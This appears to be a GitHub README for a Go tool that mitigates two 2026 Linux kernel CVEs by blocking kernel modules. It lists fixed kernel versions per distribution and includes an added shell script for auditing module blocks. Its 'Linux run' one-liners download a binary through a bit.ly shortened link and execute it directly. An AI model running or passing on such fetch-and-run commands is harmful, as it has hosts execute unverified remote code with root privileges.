https://github.com/attaattaatta/cve-2026-43284

CVE-2026-31431 + CVE-2026-43284 golang hotfix

# CVE-2026-43284 / Dirty Frag mitigation (esp4, esp6, rxrpc)

## Description
- disables `esp4, esp6, rxrpc`
- blocks module loading via `modprobe`

## Linux run
```bash
# Resolve the release asset URL (skipping the Windows .exe), download it and run it
b="/tmp/cve_2026_43284_hotfix"; wget -qO "$b" "$(wget -qO- https://bit.ly/4elJXcG | grep browser_download_url | grep -v '\.exe' | cut -d '"' -f 4)" && chmod +x "$b" && "$b"
```
or
```bash
# Same steps using curl instead of wget
b="/tmp/cve_2026_43284_hotfix"; curl -fsSL "$(curl -fsSL https://bit.ly/4elJXcG | grep browser_download_url | grep -v '\.exe' | cut -d '"' -f 4)" -o "$b" && chmod +x "$b" && "$b"
```

## Linux build
```bash
docker run --rm -v "$PWD":/app -w /app golang:alpine sh -c "apk add --no-cache upx && go build -ldflags='-s -w' -o cve_2026_43284_hotfix cve_2026_43284_hotfix.go && upx --best --ultra-brute cve_2026_43284_hotfix"
```

## Fixed kernel versions

| OS | kernel |
|---------|---------|
| Debian 10 (buster) | security backport not yet available |
| Debian 11 (bullseye) | not yet available |
| Debian 12 (bookworm) | not yet available |
| Debian 13 (trixie) | not yet available |

Debian fix command:
```bash
apt update && apt install linux-image-amd64 linux-headers-amd64 -y
```

| OS | kernel |
|---------|---------|
| Ubuntu 18.04 (bionic) | security backport not yet available |
| Ubuntu 20.04 (focal) | security backport not yet available |
| Ubuntu 22.04 (jammy) | not yet available |
| Ubuntu 24.04 (noble) | not yet available |
| Ubuntu 25.04 (plucky) | not yet available |
| Ubuntu 26.04 (resolute) | not yet available |

Ubuntu fix command:
```bash
apt update && apt install linux-image-generic linux-headers-generic -y
```

| OS | kernel |
|---------|---------|
| CentOS Stream 8 | security backport not yet available |
| CentOS Stream 9 | not yet available |
| CentOS Stream 10 | not yet available |

CentOS fix commands:
```bash
yum upgrade kernel -y
yum upgrade kernel-uek -y
```

| OS | kernel |
|---------|---------|
| AlmaLinux 8.10 | 4.18.0-553.123.2.el8_10.x86_64 |
| AlmaLinux 9.7 | 5.14.0-611.54.3.el9_7.x86_64 |
| AlmaLinux 10.1 | 6.12.0-124.55.3.el10_1.x86_64 |

AlmaLinux fix command:
```bash
dnf clean metadata && dnf upgrade kernel -y
```

| OS | kernel |
|---------|---------|
| Rocky Linux 8.10 | not yet available |
| Rocky Linux 9.7 | not yet available |
| Rocky Linux 10.1 | not yet available |

Rocky Linux fix command:
```bash
dnf upgrade kernel -y
```

| OS | kernel |
|---------|---------|
| Fedora 40 | security backport not yet available |
| Fedora 41 | security backport not yet available |
| Fedora 42 | not yet available |
| Fedora 43 | not yet available |

Fedora fix command:
```bash
dnf upgrade kernel -y
```

# CVE-2026-31431 / Copy Fail mitigation (algif_aead)

## Description

This tool checks whether the precondition for **CVE-2026-31431** is met and, when run as root, applies the mitigation:

- identifies OS (including WSL) and kernel version combinations that are already protected
- offers a kernel update that contains the fix, if one is available
- disables `algif_aead`
- blocks module loading via `modprobe`
- adds the `initcall_blacklist=algif_aead_init` kernel parameter
- restricts `AF_ALG` via systemd
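
To confirm that the module-level mitigations listed above and in the Dirty Frag section (`esp4`, `esp6`, `rxrpc`, `algif_aead`) actually took effect, the following added example (not part of the project's code) audits loaded modules, `modprobe.d` rules and the kernel command line. The function names, the sample files and the assumption that the block is an `install <module> /bin/false` rule are illustrative; the page does not show what the tool writes.

```shell
#!/bin/sh
# Added example: file paths are parameters so the checks can run on sample files.

# is_loaded MODULE [MODULES_FILE]: true if MODULE (underscore form) is loaded
is_loaded() {
    awk -v m="$1" '$1 == m { f = 1 } END { exit !f }' "${2:-/proc/modules}"
}

# block_state MODULE [DIR]: prints install-blocked, blacklist-only or none.
# modprobe treats '-' and '_' in module names as the same character.
block_state() {
    cat "${2:-/etc/modprobe.d}"/*.conf 2>/dev/null | awk -v m="$1" '
        { name = $2; gsub(/-/, "_", name) }
        $1 == "install" && name == m && $3 ~ /\/(false|true)$/ { hard = 1 }
        $1 == "blacklist" && name == m { soft = 1 }
        END { print (hard ? "install-blocked" : (soft ? "blacklist-only" : "none")) }'
}

# initcall_blocked FUNC [CMDLINE_FILE]: true if FUNC is in initcall_blacklist=
initcall_blocked() {
    tr ' ' '\n' < "${2:-/proc/cmdline}" |
        grep -Eq "^initcall_blacklist=(.*,)?$1(,.*)?\$"
}

# audit MODULE MODULES_FILE DIR: one-line verdict combining both module checks
audit() {
    state=$(block_state "$1" "$3")
    if is_loaded "$1" "$2"; then loaded=loaded; else loaded=not-loaded; fi
    printf '%s %s %s\n' "$1" "$loaded" "$state"
}

# Constructed sample files (not taken from a real host)
demo=$(mktemp -d)
printf '%s\n' 'esp4 28672 0 - Live 0x0' 'rxrpc 393216 0 - Live 0x0' > "$demo/modules"
printf '%s\n' '# constructed drop-in' 'install esp4 /bin/false' \
    'install algif-aead /bin/false' 'blacklist rxrpc' > "$demo/hotfix.conf"
echo 'BOOT_IMAGE=/vmlinuz ro quiet initcall_blacklist=algif_aead_init' > "$demo/cmdline"

for mod in esp4 esp6 rxrpc algif_aead; do
    audit "$mod" "$demo/modules" "$demo"
done
```

A module reported as `loaded install-blocked` stays resident until it is unloaded or the host reboots, and `blacklist-only` does not stop an explicit `modprobe <module>`. On a real host, call the functions without the file arguments to read `/proc/modules`, `/etc/modprobe.d` and `/proc/cmdline`.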

## Fixed kernel versions

| OS | kernel |
|---------|---------|
| Debian 10 (buster) | security backport not yet available |
| Debian 11 (bullseye) | 5.10.0-41 and above |
| Debian 12 (bookworm) | 6.1.0-45 and above |
| Debian 13 (trixie) | 6.12.85-1 and above |

Debian fix command:
```bash
apt update && apt install linux-image-amd64 linux-headers-amd64 -y
```

| OS | kernel |
|---------|---------|
| Ubuntu 18.04 (bionic) | security backport not yet available |
| Ubuntu 20.04 (focal) | security backport not yet available |
| Ubuntu 22.04 (jammy) | 5.15.0-177-generic and above |
| Ubuntu 24.04 (noble) | 6.8.0-111-generic and above |
| Ubuntu 25.04 (plucky) | 6.14.0-37-generic and above |
| Ubuntu 26.04 (resolute) | 7.0.0-15-generic and above |

Ubuntu fix command:
```bash
apt update && apt install linux-image-generic linux-headers-generic -y
```

| OS | kernel |
|---------|---------|
| CentOS Stream 8 | security backport not yet available |
| CentOS Stream 9 | not yet available |
| CentOS Stream 10 | not yet available |

CentOS fix commands:
```bash
yum upgrade kernel -y
yum upgrade kernel-uek -y
```

| OS | kernel |
|---------|---------|
| AlmaLinux 8.10 | 4.18.0-553.121.1.el8_10.x86_64 and above |
| AlmaLinux 9.7 | 5.14.0-611.49.2.el9_7.x86_64 and above |
| AlmaLinux 10.1 | 6.12.0-124.52.3.el10_1.x86_64 and above |

AlmaLinux fix command:
```bash
dnf clean metadata && dnf upgrade kernel -y
```

| OS | kernel |
|---------|---------|
| Rocky Linux 8.10 | 4.18.0-553.123.1.el8_10 |
| Rocky Linux 9.7 | 5.14.0-611.54.1.el9_7.x86_64 |
| Rocky Linux 10.1 | 6.12.0-124.55.1.el10_1.x86_64 |

Rocky Linux fix command:
```bash
dnf upgrade kernel -y
```

| OS | kernel |
|---------|---------|
| Fedora 40 | security backport not yet available |
| Fedora 41 | security backport not yet available |
| Fedora 42 | 6.19.14-100.fc42.x86_64 and above |
| Fedora 43 | 6.19.14-200.fc43.x86_64 and above |

Fedora fix command:
```bash
dnf upgrade kernel -y
```

| OS | kernel |
|---------|---------|
| Oracle Linux 8 | 5.15.0-319.201.4.4.el8uek.x86_64 and above |
| Oracle Linux 9 | 6.12.0-201.74.2.2.el9uek.x86_64 and above |
| Oracle Linux 10 | 6.12.0-201.74.2.2.el10uek.x86_64 and above |

Oracle Linux fix commands:
```bash
yum upgrade kernel kernel-uek -y
```